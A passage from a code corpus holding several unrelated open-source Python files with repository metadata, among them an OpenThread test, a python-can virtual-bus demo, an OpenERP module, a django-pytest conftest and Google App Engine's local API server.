self.assertFalse(any('2001:2:0:2' in addr[0:10] for addr in addrs))
for addr in addrs:
if addr[0:10] == '2001:2:0:1' or addr[0:10] == '2001:2:0:2':
self.assertTrue(self.nodes[LEADER].ping(addr))
if __name__ == '__main__':
unittest.main()
|
JakubBrachTieto/openthread
|
tests/scripts/thread-cert/Cert_5_6_01_NetworkDataRegisterBeforeAttachLeader.py
|
Python
|
bsd-3-clause
| 4,513 | 0.000665 |
"""
This demo creates multiple processes of Producers to spam a socketcan bus.
"""
import time
import logging
import concurrent.futures
import can
can.rc['interface'] = 'socketcan_native'
from can.interfaces.interface import Bus
can_interface = 'vcan0'
def producer(id):
""":param id: Spam the bus with messages including the data id."""
bus = Bus(can_interface)
for i in range(16):
msg = can.Message(arbitration_id=0x0cf02200, data=[id, i, 0, 1, 3, 1, 4, 1])
bus.send(msg)
# TODO Issue #3: Need to keep running to ensure the writing threads stay alive. ?
time.sleep(2)
if __name__ == "__main__":
#logging.getLogger('').setLevel(logging.DEBUG)
with concurrent.futures.ProcessPoolExecutor(max_workers=4) as executor:
executor.map(producer, range(5))
time.sleep(2)
|
BateauNautilus/DriveSimulator
|
lib/pythoncan/examples/virtual_can_demo.py
|
Python
|
mit
| 822 | 0.006083 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2017 Didotech SRL
import logging
from openerp.osv import fields, orm
import tools
from openerp import addons
_logger = logging.getLogger(__name__)
_logger.setLevel(logging.DEBUG)
class res_users(orm.Model):
_inherit = "res.users"
def _get_photo(self, cr, uid, context=None):
photo_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png')
return open(photo_path, 'rb').read().encode('base64')
def _get_image(self, cr, uid, ids, name, args, context=None):
result = dict.fromkeys(ids, False)
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = tools.image_get_resized_images(obj.image)
return result
def _set_image(self, cr, uid, id, name, value, args, context=None):
return self.write(cr, uid, [id], {'image': tools.image_resize_image_big(value)}, context=context)
def _has_image(self, cr, uid, ids, name, args, context=None):
result = {}
for obj in self.browse(cr, uid, ids, context=context):
result[obj.id] = obj.image or False
return result
def _get_default_image(self, cr, uid, context=None):
image_path = addons.get_module_resource('res_users_kanban', 'static/src/img', 'default_image.png')
return tools.image_resize_image_big(open(image_path, 'rb').read().encode('base64'))
_columns = {
'image': fields.binary("Image",
help="This field holds the image used as avatar for this contact, limited to 1024x1024px"),
'image_medium': fields.function(_get_image, fnct_inv=_set_image,
string="Medium-sized image", type="binary", multi="_get_image",
store={
'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
},
help="Medium-sized image of this contact. It is automatically "\
"resized as a 128x128px image, with aspect ratio preserved. "\
"Use this field in form views or some kanban views."),
'image_small': fields.function(_get_image, fnct_inv=_set_image,
string="Small-sized image", type="binary", multi="_get_image",
store={
'res.partner': (lambda self, cr, uid, ids, c={}: ids, ['image'], 10),
},
help="Small-sized image of this contact. It is automatically "\
"resized as a 64x64px image, with aspect ratio preserved. "\
"Use this field anywhere a small image is required."),
'has_image': fields.function(_has_image, type="boolean"),
}
_defaults = {
'image': lambda self, cr, uid, ctx={}: self._get_default_image(cr, uid, ctx),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
iw3hxn/LibrERP
|
res_users_kanban/models/inherit_res_users.py
|
Python
|
agpl-3.0
| 2,957 | 0.005749 |
"""."""
def get_systeminfo(resource, config, interactive=False):
"""."""
return {'ohai': 'there!'}
|
lil-cain/satori
|
satori/sysinfo/ohai.py
|
Python
|
apache-2.0
| 109 | 0 |
from abc import ABCMeta, abstractmethod
class Parent(object):
__metaclass__ = ABCMeta
@abstractmethod
def my_method2(self):
pass
@abstractmethod
def my_method(self, foo):
pass
|
akosyakov/intellij-community
|
python/testData/refactoring/pullup/abstractMethodHasMeta/SuperClass.after.py
|
Python
|
apache-2.0
| 215 | 0.004651 |
import os, sys
from functools import partial
if 'DJANGO_SETTINGS_MODULE' not in os.environ:
sys.path.append('.')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
from django.conf import settings
from django.test.client import Client
from django.test.utils import setup_test_environment, teardown_test_environment
from django.core.management import call_command
from django.core import mail
from django.contrib.auth.models import User
def pytest_funcarg__django_client(request):
'''py.test funcargs are awesome. This ugly function basically creates a
test environment with an empty database every time you write a test
function that accepts an argument named 'django_client.' Most of the time
you won't use this, you'll use the 'client' funcarg below instead. This
funcarg is only reset once per test session. The 'client' funcarg empties
the database after each test to ensure a clean slate.'''
try:
old_name = settings.DATABASES['default']['NAME']
except AttributeError:
# try older settings format
old_name = settings.DATABASE_NAME
def setup():
setup_test_environment()
if not hasattr(settings, 'DEBUG'):
settings.DEBUG = False
if 'south' in settings.INSTALLED_APPS:
from south.management.commands import patch_for_test_db_setup
patch_for_test_db_setup()
from django.db import connection
connection.creation.create_test_db(1, True)
return Client()
def teardown(client):
teardown_test_environment()
from django.db import connection
connection.creation.destroy_test_db(old_name, 1)
return request.cached_setup(setup, teardown, "session")
def pytest_funcarg__client(request):
'''Creates a test environment using the 'django_client' funcarg above, but
also ensures the database is flushed after running each test.'''
def setup():
return request.getfuncargvalue('django_client')
def teardown(client):
call_command('flush', verbosity=0, interactive=False)
mail.outbox = []
return request.cached_setup(setup, teardown, "function")
def user_creator(name, email, **extra):
'''Creates a user.'''
# Note: I make test usernames and passwords identical for easy login
user = User.objects.create_user(username=name,
password=name,
email=email)
for attr, value in extra.iteritems():
setattr(user, attr, value)
user.save()
return user
def pytest_funcarg__user(request):
'''Create a user with no special permissions.'''
return request.cached_setup(partial(user_creator,
"user",
"user@example.com"),
lambda user: user.delete(),
"session")
def pytest_funcarg__admin(request):
'''Create an admin user with all permissions.'''
return request.cached_setup(partial(user_creator,
"admin",
"admin@example.com",
is_superuser=True,
is_staff=True),
lambda user: user.delete(),
"session")
|
0101/django-pytest
|
django_pytest/conftest.py
|
Python
|
bsd-3-clause
| 3,390 | 0.00236 |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Serves the stub App Engine APIs (e.g. memcache, datastore) over HTTP.
The Remote API protocol is used for communication.
"""
from __future__ import with_statement
import BaseHTTPServer
import httplib
import logging
import os.path
import pickle
import socket
import SocketServer
import subprocess
import sys
import tempfile
import threading
import time
import traceback
import urllib2
import urlparse
import wsgiref.headers
import google
import yaml
from google.appengine.api import mail_stub
from google.appengine.api import request_info
from google.appengine.api import urlfetch_stub
from google.appengine.api import user_service_stub
from google.appengine.api.app_identity import app_identity_stub
from google.appengine.api.blobstore import blobstore_stub
from google.appengine.api.blobstore import file_blob_storage
from google.appengine.api.capabilities import capability_stub
from google.appengine.api.channel import channel_service_stub
from google.appengine.api.files import file_service_stub
from google.appengine.api.logservice import logservice_stub
from google.appengine.api.search import simple_search_stub
from google.appengine.api.taskqueue import taskqueue_stub
from google.appengine.api.prospective_search import prospective_search_stub
from google.appengine.api.memcache import memcache_stub
from google.appengine.api.system import system_stub
from google.appengine.api.xmpp import xmpp_service_stub
from google.appengine.api import datastore_file_stub
from google.appengine.datastore import datastore_sqlite_stub
from google.appengine.datastore import datastore_stub_util
from google.appengine.datastore import datastore_v4_stub
from google.appengine.api import apiproxy_stub_map
from google.appengine.ext.remote_api import remote_api_pb
from google.appengine.ext.remote_api import remote_api_services
from google.appengine.runtime import apiproxy_errors
QUIT_PATH = '/quit'
GLOBAL_API_LOCK = threading.RLock()
class Error(Exception):
pass
def _ClearDatastoreStorage(datastore_path):
"""Delete the datastore storage file at the given path."""
if os.path.lexists(datastore_path):
try:
os.remove(datastore_path)
except OSError, e:
logging.warning('Failed to remove datastore file %r: %s',
datastore_path,
e)
def _ClearProspectiveSearchStorage(prospective_search_path):
"""Delete the perspective search storage file at the given path."""
if os.path.lexists(prospective_search_path):
try:
os.remove(prospective_search_path)
except OSError, e:
logging.warning('Failed to remove prospective search file %r: %s',
prospective_search_path,
e)
THREAD_SAFE_SERVICES = frozenset((
'app_identity_service',
'capability_service',
'channel',
'logservice',
'mail',
'memcache',
'remote_socket',
'urlfetch',
'user',
'xmpp',
))
def _ExecuteRequest(request):
"""Executes an API method call and returns the response object.
Args:
request: A remote_api.Request object representing the API call e.g. a call
to memcache.Get.
Returns:
A ProtocolBuffer.ProtocolMessage representing the API response e.g. a
memcache_service_pb.MemcacheGetResponse.
Raises:
apiproxy_errors.CallNotFoundError: if the requested method doesn't exist.
apiproxy_errors.ApplicationError: if the API method calls fails.
"""
service = request.service_name()
method = request.method()
service_methods = remote_api_services.SERVICE_PB_MAP.get(service, {})
request_class, response_class = service_methods.get(method, (None, None))
if not request_class:
raise apiproxy_errors.CallNotFoundError('%s.%s does not exist' % (service,
method))
request_data = request_class()
request_data.ParseFromString(request.request())
response_data = response_class()
def MakeRequest():
apiproxy_stub_map.MakeSyncCall(service, method, request_data,
response_data)
if service in THREAD_SAFE_SERVICES:
MakeRequest()
else:
with GLOBAL_API_LOCK:
MakeRequest()
return response_data
class APIRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
"""Handler for all API server HTTP requests."""
def log_message(self, format, *args):
logging.debug(format, *args)
def do_GET(self):
if self.path == QUIT_PATH:
self._HandleShutdown()
else:
params = urlparse.parse_qs(urlparse.urlparse(self.path).query)
rtok = params.get('rtok', ['0'])[0]
self.send_response(httplib.OK)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write(yaml.dump({
'app_id': self.server.app_id,
'rtok': rtok,
}))
def _HandleShutdown(self):
"""Handles a request for the API Server to exit."""
self.send_response(httplib.OK)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
self.wfile.write('API Server Quitting')
self.server.shutdown()
def do_POST(self):
"""Handles a single API request e.g. memcache.Get()."""
self.send_response(httplib.OK)
self.send_header('Content-Type', 'application/octet-stream')
self.end_headers()
response = remote_api_pb.Response()
try:
request = remote_api_pb.Request()
request.ParseFromString(
self.rfile.read(int(self.headers['content-length'])))
api_response = _ExecuteRequest(request).Encode()
response.set_response(api_response)
except Exception, e:
logging.debug('Exception while handling %s\n%s',
request,
traceback.format_exc())
response.set_exception(pickle.dumps(e))
if isinstance(e, apiproxy_errors.ApplicationError):
application_error = response.mutable_application_error()
application_error.set_code(e.application_error)
application_error.set_detail(e.error_detail)
self.wfile.write(response.Encode())
class APIServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""Serves API calls over HTTP."""
def __init__(self, server_address, app_id):
BaseHTTPServer.HTTPServer.__init__(self, server_address, APIRequestHandler)
self.app_id = app_id
def _SetupStubs(
app_id,
application_root,
appidentity_email_address,
appidentity_private_key_path,
trusted,
blobstore_path,
use_sqlite,
auto_id_policy,
high_replication,
datastore_path,
datastore_require_indexes,
images_host_prefix,
logs_path,
mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
mail_enable_sendmail,
mail_show_mail_body,
mail_allow_tls,
matcher_prospective_search_path,
taskqueue_auto_run_tasks,
taskqueue_task_retry_seconds,
taskqueue_default_http_server,
user_login_url,
user_logout_url,
default_gcs_bucket_name):
"""Configures the APIs hosted by this server.
Args:
app_id: The str application id e.g. "guestbook".
application_root: The path to the directory containing the user's
application e.g. "/home/bquinlan/myapp".
trusted: A bool indicating if privileged APIs should be made available.
blobstore_path: The path to the file that should be used for blobstore
storage.
use_sqlite: A bool indicating whether DatastoreSqliteStub or
DatastoreFileStub should be used.
auto_id_policy: One of datastore_stub_util.SEQUENTIAL or .SCATTERED,
indicating whether the Datastore stub should assign IDs sequentially
or scattered.
high_replication: A bool indicating whether to use the high replication
consistency model.
datastore_path: The path to the file that should be used for datastore
storage.
datastore_require_indexes: A bool indicating if the same production
datastore indexes requirements should be enforced i.e. if True then
      a google.appengine.ext.db.NeedIndexError will be raised if a query
is executed without the required indexes.
    images_host_prefix: The URL prefix (protocol://host:port) to prepend to
image urls on calls to images.GetUrlBase.
logs_path: Path to the file to store the logs data in.
mail_smtp_host: The SMTP hostname that should be used when sending e-mails.
If None then the mail_enable_sendmail argument is considered.
mail_smtp_port: The SMTP port number that should be used when sending
e-mails. If this value is None then mail_smtp_host must also be None.
mail_smtp_user: The username to use when authenticating with the
SMTP server. This value may be None if mail_smtp_host is also None or if
the SMTP server does not require authentication.
mail_smtp_password: The password to use when authenticating with the
SMTP server. This value may be None if mail_smtp_host or mail_smtp_user
is also None.
mail_enable_sendmail: A bool indicating if sendmail should be used when
sending e-mails. This argument is ignored if mail_smtp_host is not None.
mail_show_mail_body: A bool indicating whether the body of sent e-mails
should be written to the logs.
mail_allow_tls: A bool indicating whether to allow TLS support.
matcher_prospective_search_path: The path to the file that should be used to
save prospective search subscriptions.
taskqueue_auto_run_tasks: A bool indicating whether taskqueue tasks should
      be run automatically or if they must be manually triggered.
taskqueue_task_retry_seconds: An int representing the number of seconds to
wait before a retrying a failed taskqueue task.
taskqueue_default_http_server: A str containing the address of the http
server that should be used to execute tasks.
user_login_url: A str containing the url that should be used for user login.
user_logout_url: A str containing the url that should be used for user
logout.
default_gcs_bucket_name: A str overriding the usual default bucket name.
"""
os.environ['APPLICATION_ID'] = app_id
tmp_app_identity_stub = app_identity_stub.AppIdentityServiceStub.Create(
email_address=appidentity_email_address,
private_key_path=appidentity_private_key_path)
if default_gcs_bucket_name is not None:
tmp_app_identity_stub.SetDefaultGcsBucketName(default_gcs_bucket_name)
apiproxy_stub_map.apiproxy.RegisterStub(
'app_identity_service', tmp_app_identity_stub)
blob_storage = file_blob_storage.FileBlobStorage(blobstore_path, app_id)
apiproxy_stub_map.apiproxy.RegisterStub(
'blobstore',
blobstore_stub.BlobstoreServiceStub(blob_storage))
apiproxy_stub_map.apiproxy.RegisterStub(
'capability_service',
capability_stub.CapabilityServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'channel',
channel_service_stub.ChannelServiceStub())
if use_sqlite:
datastore = datastore_sqlite_stub.DatastoreSqliteStub(
app_id,
datastore_path,
datastore_require_indexes,
trusted,
root_path=application_root,
auto_id_policy=auto_id_policy)
else:
datastore = datastore_file_stub.DatastoreFileStub(
app_id,
datastore_path,
datastore_require_indexes,
trusted,
root_path=application_root,
auto_id_policy=auto_id_policy)
if high_replication:
datastore.SetConsistencyPolicy(
datastore_stub_util.TimeBasedHRConsistencyPolicy())
apiproxy_stub_map.apiproxy.RegisterStub(
'datastore_v3', datastore)
apiproxy_stub_map.apiproxy.RegisterStub(
'datastore_v4',
datastore_v4_stub.DatastoreV4Stub(app_id))
apiproxy_stub_map.apiproxy.RegisterStub(
'file',
file_service_stub.FileServiceStub(blob_storage))
try:
from google.appengine.api.images import images_stub
except ImportError:
from google.appengine.api.images import images_not_implemented_stub
apiproxy_stub_map.apiproxy.RegisterStub(
'images',
images_not_implemented_stub.ImagesNotImplementedServiceStub())
else:
apiproxy_stub_map.apiproxy.RegisterStub(
'images',
images_stub.ImagesServiceStub(host_prefix=images_host_prefix))
apiproxy_stub_map.apiproxy.RegisterStub(
'logservice',
logservice_stub.LogServiceStub(logs_path=logs_path))
apiproxy_stub_map.apiproxy.RegisterStub(
'mail',
mail_stub.MailServiceStub(mail_smtp_host,
mail_smtp_port,
mail_smtp_user,
mail_smtp_password,
enable_sendmail=mail_enable_sendmail,
show_mail_body=mail_show_mail_body,
allow_tls=mail_allow_tls))
apiproxy_stub_map.apiproxy.RegisterStub(
'memcache',
memcache_stub.MemcacheServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'search',
simple_search_stub.SearchServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub('system',
system_stub.SystemServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'taskqueue',
taskqueue_stub.TaskQueueServiceStub(
root_path=application_root,
auto_task_running=taskqueue_auto_run_tasks,
task_retry_seconds=taskqueue_task_retry_seconds,
default_http_server=taskqueue_default_http_server))
apiproxy_stub_map.apiproxy.GetStub('taskqueue').StartBackgroundExecution()
apiproxy_stub_map.apiproxy.RegisterStub(
'urlfetch',
urlfetch_stub.URLFetchServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'user',
user_service_stub.UserServiceStub(login_url=user_login_url,
logout_url=user_logout_url))
apiproxy_stub_map.apiproxy.RegisterStub(
'xmpp',
xmpp_service_stub.XmppServiceStub())
apiproxy_stub_map.apiproxy.RegisterStub(
'matcher',
prospective_search_stub.ProspectiveSearchStub(
matcher_prospective_search_path,
apiproxy_stub_map.apiproxy.GetStub('taskqueue')))
def _TearDownStubs():
"""Clean up any stubs that need cleanup."""
logging.info('Applying all pending transactions and saving the datastore')
datastore_stub = apiproxy_stub_map.apiproxy.GetStub('datastore_v3')
datastore_stub.Write()
def ParseCommandArguments(args):
"""Parses and the application's command line arguments.
Args:
args: A list of command line arguments *not* including the executable or
script e.g. ['-A' 'myapp', '--api_port=8000'].
Returns:
An object containing the values passed in the commandline as attributes.
Raises:
SystemExit: if the argument parsing fails.
"""
import argparse
from google.appengine.tools import boolean_action
parser = argparse.ArgumentParser()
parser.add_argument('-A', '--application', required=True)
parser.add_argument('--api_host', default='')
parser.add_argument('--api_port', default=8000, type=int)
parser.add_argument('--trusted',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--appidentity_email_address', default=None)
parser.add_argument('--appidentity_private_key_path', default=None)
parser.add_argument('--application_root', default=None)
parser.add_argument('--application_host', default='localhost')
parser.add_argument('--application_port', default=None)
parser.add_argument('--blobstore_path', default=None)
parser.add_argument('--datastore_path', default=None)
parser.add_argument('--auto_id_policy', default='scattered',
type=lambda s: s.lower(),
choices=(datastore_stub_util.SEQUENTIAL,
datastore_stub_util.SCATTERED))
parser.add_argument('--use_sqlite',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--high_replication',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--require_indexes',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--clear_datastore',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--logs_path', default=None)
parser.add_argument('--enable_sendmail',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--smtp_host', default='')
parser.add_argument('--smtp_port', default=25, type=int)
parser.add_argument('--smtp_user', default='')
parser.add_argument('--smtp_password', default='')
parser.add_argument('--show_mail_body',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--smtp_allow_tls',
action=boolean_action.BooleanAction,
const=True,
default=True)
parser.add_argument('--prospective_search_path', default=None)
parser.add_argument('--clear_prospective_search',
action=boolean_action.BooleanAction,
const=True,
default=False)
parser.add_argument('--enable_task_running',
action=boolean_action.BooleanAction,
const=True,
default=True)
parser.add_argument('--task_retry_seconds', default=30, type=int)
parser.add_argument('--user_login_url', default=None)
parser.add_argument('--user_logout_url', default=None)
return parser.parse_args(args)
class APIServerProcess(object):
"""Manages an API Server running as a seperate process."""
def __init__(self,
executable,
host,
port,
app_id,
script=None,
appidentity_email_address=None,
appidentity_private_key_path=None,
application_host=None,
application_port=None,
application_root=None,
auto_id_policy=None,
blobstore_path=None,
clear_datastore=None,
clear_prospective_search=None,
datastore_path=None,
enable_sendmail=None,
enable_task_running=None,
high_replication=None,
logs_path=None,
prospective_search_path=None,
require_indexes=None,
show_mail_body=None,
smtp_host=None,
smtp_password=None,
smtp_port=None,
smtp_user=None,
smtp_allow_tls=None,
task_retry_seconds=None,
trusted=None,
use_sqlite=None,
default_gcs_bucket_name=None):
"""Configures the APIs hosted by this server.
Args:
executable: The path of the executable to use when running the API Server
e.g. "/usr/bin/python".
host: The host name that should be used by the API Server e.g.
"localhost".
port: The port number that should be used by the API Server e.g. 8080.
app_id: The str application id e.g. "guestbook".
script: The name of the script that should be used, along with the
executable argument, to run the API Server e.g. "api_server.py".
If None then the executable is run without a script argument.
appidentity_email_address: Email address for service account substitute.
appidentity_private_key_path: Private key for service account substitute.
application_host: The name of the host where the development application
server is running e.g. "localhost".
application_port: The port where the application server is running e.g.
8000.
application_root: The path to the directory containing the user's
application e.g. "/home/bquinlan/myapp".
auto_id_policy: One of "sequential" or "scattered", indicating whether
the Datastore stub should assign IDs sequentially or scattered.
blobstore_path: The path to the file that should be used for blobstore
storage.
clear_datastore: Clears the file at datastore_path, emptying the
datastore from previous runs.
clear_prospective_search: Clears the file at prospective_search_path,
        emptying the prospective search state from previous runs.
datastore_path: The path to the file that should be used for datastore
storage.
enable_sendmail: A bool indicating if sendmail should be used when sending
e-mails. This argument is ignored if mail_smtp_host is not None.
enable_task_running: A bool indicating whether taskqueue tasks should
        be run automatically or if they must be manually triggered.
high_replication: A bool indicating whether to use the high replication
consistency model.
logs_path: Path to the file to store the logs data in.
prospective_search_path: The path to the file that should be used to
save prospective search subscriptions.
require_indexes: A bool indicating if the same production
datastore indexes requirements should be enforced i.e. if True then
        a google.appengine.ext.db.NeedIndexError will be raised if a query
is executed without the required indexes.
show_mail_body: A bool indicating whether the body of sent e-mails
should be written to the logs.
smtp_host: The SMTP hostname that should be used when sending e-mails.
If None then the enable_sendmail argument is considered.
smtp_password: The password to use when authenticating with the
SMTP server. This value may be None if smtp_host or smtp_user
is also None.
smtp_port: The SMTP port number that should be used when sending
e-mails. If this value is None then smtp_host must also be None.
smtp_user: The username to use when authenticating with the
SMTP server. This value may be None if smtp_host is also None or if
the SMTP server does not require authentication.
smtp_allow_tls: A bool indicating whether to enable TLS.
task_retry_seconds: An int representing the number of seconds to
wait before a retrying a failed taskqueue task.
trusted: A bool indicating if privileged APIs should be made available.
use_sqlite: A bool indicating whether DatastoreSqliteStub or
DatastoreFileStub should be used.
default_gcs_bucket_name: A str overriding the normal default bucket name.
"""
self._process = None
self._host = host
self._port = port
if script:
self._args = [executable, script]
else:
self._args = [executable]
self._BindArgument('--api_host', host)
self._BindArgument('--api_port', port)
self._BindArgument('--appidentity_email_address', appidentity_email_address)
self._BindArgument('--appidentity_private_key_path', appidentity_private_key_path)
self._BindArgument('--application_host', application_host)
self._BindArgument('--application_port', application_port)
self._BindArgument('--application_root', application_root)
self._BindArgument('--application', app_id)
self._BindArgument('--auto_id_policy', auto_id_policy)
self._BindArgument('--blobstore_path', blobstore_path)
self._BindArgument('--clear_datastore', clear_datastore)
self._BindArgument('--clear_prospective_search', clear_prospective_search)
self._BindArgument('--datastore_path', datastore_path)
self._BindArgument('--enable_sendmail', enable_sendmail)
self._BindArgument('--enable_task_running', enable_task_running)
self._BindArgument('--high_replication', high_replication)
self._BindArgument('--logs_path', logs_path)
self._BindArgument('--prospective_search_path', prospective_search_path)
self._BindArgument('--require_indexes', require_indexes)
self._BindArgument('--show_mail_body', show_mail_body)
self._BindArgument('--smtp_host', smtp_host)
self._BindArgument('--smtp_password', smtp_password)
self._BindArgument('--smtp_port', smtp_port)
self._BindArgument('--smtp_user', smtp_user)
self._BindArgument('--smtp_allow_tls', smtp_allow_tls)
self._BindArgument('--task_retry_seconds', task_retry_seconds)
self._BindArgument('--trusted', trusted)
self._BindArgument('--use_sqlite', use_sqlite)
self._BindArgument('--default_gcs_bucket_name', default_gcs_bucket_name)
@property
def url(self):
"""Returns the URL that should be used to communicate with the server."""
return 'http://%s:%d' % (self._host, self._port)
def __repr__(self):
return '<APIServerProcess command=%r>' % ' '.join(self._args)
def Start(self):
"""Starts the API Server process."""
assert not self._process, 'Start() can only be called once'
self._process = subprocess.Popen(self._args)
def _CanConnect(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((self._host, self._port))
except socket.error:
connected = False
else:
connected = True
s.close()
return connected
def WaitUntilServing(self, timeout=30.0):
"""Waits until the API Server is ready to handle requests.
Args:
timeout: The maximum number of seconds to wait for the server to be ready.
Raises:
Error: if the server process exits or is not ready in "timeout" seconds.
"""
assert self._process, 'server was not started'
finish_time = time.time() + timeout
while time.time() < finish_time:
if self._process.poll() is not None:
raise Error('server has already exited with return: %r',
self._process.returncode)
if self._CanConnect():
return
time.sleep(0.2)
raise Error('server did not start after %f seconds', timeout)
def _BindArgument(self, argument, value):
if value is not None:
self._args.append('%s=%s' % (argument, value))
def Quit(self, timeout=5.0):
"""Causes the API Server process to exit.
Args:
timeout: The maximum number of seconds to wait for an orderly shutdown
before forceably killing the process.
"""
assert self._process, 'server was not started'
if self._process.poll() is None:
try:
urllib2.urlopen(self.url + QUIT_PATH)
except urllib2.URLError:
pass
finish_time = time.time() + timeout
while time.time() < finish_time and self._process.poll() is None:
time.sleep(0.2)
if self._process.returncode is None:
logging.warning('api_server did not quit cleanly, killing')
self._process.kill()
class ApiServerDispatcher(request_info._LocalFakeDispatcher):
"""An api_server Dispatcher implementation."""
def add_request(self, method, relative_url, headers, body, source_ip,
server_name=None, version=None, instance_id=None):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
server_name: An optional str containing the server name to service this
request. If unset, the request will be dispatched to the default
server.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the server and version.
Returns:
A request_info.ResponseTuple containing the response information for the
HTTP request.
"""
try:
header_dict = wsgiref.headers.Headers(headers)
connection_host = header_dict.get('host')
connection = httplib.HTTPConnection(connection_host)
connection.putrequest(
method, relative_url,
skip_host='host' in header_dict,
skip_accept_encoding='accept-encoding' in header_dict)
for header_key, header_value in headers:
connection.putheader(header_key, header_value)
connection.endheaders()
connection.send(body)
response = connection.getresponse()
response.read()
response.close()
return request_info.ResponseTuple(
'%d %s' % (response.status, response.reason), [], '')
except (httplib.HTTPException, socket.error):
logging.exception(
          'An error occurred while sending a %s request to "%s%s"',
method, connection_host, relative_url)
return request_info.ResponseTuple('0', [], '')
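# Illustrative usage sketch (hypothetical helper, not called anywhere): how a
# test harness might drive the APIServerProcess class above; the script name
# and app id are made up.
def _example_run_api_server_process():
  api = APIServerProcess(sys.executable, 'localhost', 8000, 'guestbook',
                         script='api_server.py')
  api.Start()
  api.WaitUntilServing(timeout=30.0)
  try:
    return api.url
  finally:
    api.Quit()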
def main():
logging.basicConfig(
level=logging.INFO,
format='[API Server] [%(filename)s:%(lineno)d] %(levelname)s %(message)s')
args = ParseCommandArguments(sys.argv[1:])
if args.clear_datastore:
_ClearDatastoreStorage(args.datastore_path)
if args.clear_prospective_search:
_ClearProspectiveSearchStorage(args.prospective_search_path)
if args.blobstore_path is None:
_, blobstore_temp_filename = tempfile.mkstemp(prefix='ae-blobstore')
args.blobstore_path = blobstore_temp_filename
if args.datastore_path is None:
_, datastore_temp_filename = tempfile.mkstemp(prefix='ae-datastore')
args.datastore_path = datastore_temp_filename
if args.prospective_search_path is None:
_, prospective_search_temp_filename = tempfile.mkstemp(
prefix='ae-prospective_search')
args.prospective_search_path = prospective_search_temp_filename
if args.application_host:
application_address = args.application_host
if args.application_port and args.application_port != 80:
application_address += ':' + str(args.application_port)
else:
application_address = None
if not hasattr(args, 'default_gcs_bucket_name'):
args.default_gcs_bucket_name = None
request_info._local_dispatcher = ApiServerDispatcher()
_SetupStubs(app_id=args.application,
application_root=args.application_root,
appidentity_email_address=args.appidentity_email_address,
appidentity_private_key_path=args.appidentity_private_key_path,
trusted=args.trusted,
blobstore_path=args.blobstore_path,
datastore_path=args.datastore_path,
use_sqlite=args.use_sqlite,
auto_id_policy=args.auto_id_policy,
high_replication=args.high_replication,
datastore_require_indexes=args.require_indexes,
images_host_prefix=application_address,
logs_path=args.logs_path,
mail_smtp_host=args.smtp_host,
mail_smtp_port=args.smtp_port,
mail_smtp_user=args.smtp_user,
mail_smtp_password=args.smtp_password,
mail_enable_sendmail=args.enable_sendmail,
mail_show_mail_body=args.show_mail_body,
mail_allow_tls=args.smtp_allow_tls,
matcher_prospective_search_path=args.prospective_search_path,
taskqueue_auto_run_tasks=args.enable_task_running,
taskqueue_task_retry_seconds=args.task_retry_seconds,
taskqueue_default_http_server=application_address,
user_login_url=args.user_login_url,
user_logout_url=args.user_logout_url,
default_gcs_bucket_name=args.default_gcs_bucket_name)
server = APIServer((args.api_host, args.api_port), args.application)
try:
server.serve_forever()
finally:
_TearDownStubs()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
pass
|
ychen820/microblog
|
y/google-cloud-sdk/platform/google_appengine/google/appengine/tools/api_server.py
|
Python
|
bsd-3-clause
| 33,071 | 0.006108 |
import os
import signal
import socket
from pathlib import Path
from tornado.ioloop import IOLoop
from tornado.locks import Lock
from tornado.web import Application
from pcs import settings
from pcs.daemon import log, ruby_pcsd, session, ssl, systemd
from pcs.daemon.app import sinatra_ui, sinatra_remote, ui
from pcs.daemon.app.common import RedirectHandler
from pcs.daemon.env import prepare_env
from pcs.daemon.http_server import HttpsServerManage
class SignalInfo:
# pylint: disable=too-few-public-methods
server_manage = None
ioloop_started = False
def handle_signal(incomming_signal, frame):
# pylint: disable=unused-argument
log.pcsd.warning("Caught signal: %s, shutting down", incomming_signal)
if SignalInfo.server_manage:
SignalInfo.server_manage.stop()
if SignalInfo.ioloop_started:
IOLoop.current().stop()
raise SystemExit(0)
def sign_ioloop_started():
SignalInfo.ioloop_started = True
def config_sync(sync_config_lock: Lock, ruby_pcsd_wrapper: ruby_pcsd.Wrapper):
async def config_synchronization():
